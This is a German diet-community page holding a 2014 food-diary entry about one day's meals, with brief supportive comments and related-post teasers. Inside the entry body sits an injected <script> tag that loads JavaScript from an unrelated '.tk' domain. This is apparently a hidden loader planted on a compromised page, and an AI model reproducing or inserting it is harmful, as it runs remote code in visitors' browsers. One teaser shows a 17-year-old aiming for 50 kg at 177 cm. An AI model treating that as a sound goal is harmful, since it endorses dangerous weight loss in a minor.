Zum Inhalt springen

Sie sind hier

11.08.2014 Sündsonntag vergessen

0  0
Am von im Ernährungstagebuch geschrieben

und auf gehts wieder von vorn: Morgen einen leckeren Erdbeershake - Mittag einen Apfel und grüne Gurke - Abend Fisch gebraten, Tomaten mit Fetakäse und einen Shake

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Abnehmen-Themen
Vorheriger Ernährungstagebuch-Eintrag
Bild von lania23 gelöscht, vergessen, passé
Nächster Ernährungstagebuch-Eintrag
Bild von Tag 146 - Das Foto

Kommentare

Bild des Benutzers LunaTheCat
0  0

Klingt sehr gut Smile 

Bild des Benutzers Emma09
0  0

I-m so happy - geht es die jetzt besser - alles gut verkraftet hahaha

Bild des Benutzers LunaTheCat
0  0

Ja, alles gut Biggrin 

Mit meiner heutigen Ernährung bin ich auch ziemlich zufrieden Smile 

Ganz vegetarisch Biggrin

Bild des Benutzers Emma09
0  0

na dann geht es doch wieder - super I-m so happy

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Forenthema von Nekurasama: Hey Ich bin 17/w. 177cm Aktuell: ca.80kg Ziel: 50kg Zieldatum: ende des jahres. Würde mich über einen partner freuen^^.
Eintrag in ein Ernährungstagebuch von Josie: Hallo ihr Lieben, dies ist nun mein 4. Start bei der Diätclique. Abnehmen und wieder zu, begleitet mich aber schon viel länger. Dauerhaft schlank bin ich leider bisher nicht geblieben. Mein Problem...
Eintrag in ein Ernährungstagebuch von veilchen: Meine Lieben. Was soll ich sagen, ich hatte ja die letzte Woche diesen Mageninfekt "den bei uns alle hatten". (ha. na das wäre komisch...) Ich scheinbar nicht. Ich habe nämlich einen kleinen...
Eintrag in ein Ernährungstagebuch von Juergen12053: Heute am Montag ist mein Wiegetag und es war ein Erfolg !!! ... sind jetzt 119kg !!! und ich freue mich wie ein Schneekönig - An dieser Stelle noch einmal herzlichen Dank an Alle für Eure liebe...
Forenthema von Shayenne: Shake, shake, shake, shake, shake it  Wer kennt noch das Lied von Metro Station? Heute soll es mal buchstäblich um Shakes gehen - Die machen satt, schmecken lecker und sind gesund. Seitdem ich so...
Eintrag in ein Ernährungstagebuch von TrEmLi: Der gestrige Speiseplan ​Frühstück: Knäckebrot mit Frischkäse (172 Kalorien) ​Mittagessen: Laugengebäck (408 Kalorien) ​Abendessen: Hähnchenkebab und Cocktailtomaten (451 Kalorien) Süßigkeiten: keine...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst

Neue Abnehmen-Tipps